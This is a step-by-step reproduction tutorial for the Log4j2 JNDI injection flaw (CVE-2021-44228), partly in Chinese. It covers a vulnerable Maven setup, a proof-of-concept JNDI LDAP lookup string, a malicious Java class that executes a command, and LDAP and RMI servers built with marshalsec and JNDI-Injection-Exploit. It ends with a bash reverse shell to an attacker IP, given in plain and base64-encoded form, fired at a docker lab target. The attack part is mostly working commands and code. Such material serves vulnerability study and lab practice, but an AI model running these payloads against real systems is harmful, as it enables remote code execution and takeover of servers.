Apache Log4j2 Code Execution Vulnerability Reappearance (cve-2021-44228)

1. Vulnerability description

log4j is an open source project of Apache, which is a logging framework based on Java. Log4j2 is the successor of log4j, which is widely used in business system development to record log information. Many Internet companies and well-known companies' systems are using this framework.

Because the Log4j2 component has a JNDI injection flaw when processing program log records, unauthorized attackers use the lookup function provided by Log4j2 to read the configuration in the corresponding environment through some protocols. However, in the process of implementation, the component does not strictly judge the input. The attacker can send carefully constructed malicious data to the target server, trigger the log4j2 component parsing flaw, realize arbitrary code execution of the target server, and obtain the target server's authority.

After the logging function of the Apache Log4j2 component is turned on, any place where the error log can be triggered can be inserted into the exploit code, and the exploit can be successful. In special cases, if the logs recorded by this component include the logs of other systems, it may cause indirect poisoning. Through the intermediate system, the component indirectly reads the offensive exploit code, which can also indirectly trigger the vulnerability.

At the same time, the vulnerability also affects many common open source components of the Top sequence used globally, such as Apache Struts2, Apache Solr, Apache Druid, Apache Flink, etc.

2. Scope of influence

用户认证：不需要用户认证

触发方式：远程

配置方式：默认

利用条件：需要外网访问权限

影响版本：2.0 ≤ Apache Log4j2 < 2.15.0-rc2

利用难度：极低，无需授权即可远程代码执行

威胁等级：严重，能造成远程代码执行

综合评估漏洞利用难度极低，利用要求较少，影响范围很大，危害极其严重，且已经被黑客公开利用持续全网扫描，根据部里要求，需要紧急修复。

3. Vulnerability recurrence

1. Create a maven project and import the log4j dependency package

pom.xmlas follows

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>log4j-rce</artifactId>
    <version>1.0-SNAPSHOT</version>

    <dependencies>
        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>
    </dependencies>

</project>

2. Write POC

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;


public class log4j {
    
    
    private static final Logger logger = LogManager.getLogger(log4j.class);

    public static void main(String[] args) {
    
    
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        logger.error("${jndi:ldap://127.0.0.1:8899/Log4jRCE}");
    }
}

3. Write malicious classes

public class Log4jRCE {
    
    
    static {
    
    
        try {
    
    
            String [] cmd={
    
    "calc"};
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        }catch (Exception e){
    
    
            e.printStackTrace();
        }
    }

}

Then compile it into a class file

javac Log4jRCE.java

Note : Do not put Log4jRCE.java in the project here. I put Log4jRCE.class in another directory here. Otherwise, log4j.java will read the local Log4jRCE when running, and it will not be http remote download.

4. Start http service

Use python to start an Http service in the directory where malicious class files are stored

python2 -m SimpleHTTPServer 1234

browser visit

5. Compile and start LDAP service

Download the marshalsec projecthttps://github.com/mbechler/marshalsec

Under java8, use maven to build mvn clean package -DskipTests to generate the corresponding jar package

Start the LDAP service, monitor port 8899, and formulate the remote loading class Log4jRCE.class

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.8.14:1234/#Log4jRCE" 8899

6. Run POC

Run log4j.java, you can access the malicious class and execute the "calc" command written in it

4. Rebound shell

1. Shooting range construction

Use docker to pull the vulnerability image

docker pull vulfocus/log4j2-rce-2021-12-09:latest

Start the vulnerability environment

docker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest

2. Access the vulnerable environment, and the environment is deployed successfully

3. Starting RMI and Ldap services

reverse shell command

bash -i >& /dev/tcp/192.168.8.14/9999 0>&1

Visit the URL: https://www.jackson-t.ca/runtime-exec-payloads.html, transform the rebound shell command through exec() as follows:

bash -c {
    
    echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjguMTQvOTk5OSAwPiYx}|{
    
    base64,-d}|{
    
    bash,-i}

Need to use JNDI-Injection-Exploit( https://github.com/welk1n/JNDI-Injection-Exploit) to start an rmi and ldap server

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjguMTQvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.8.14"

4. Turn on nc monitoring

5. Firefox browser to verify

6. Reverse the shell successfully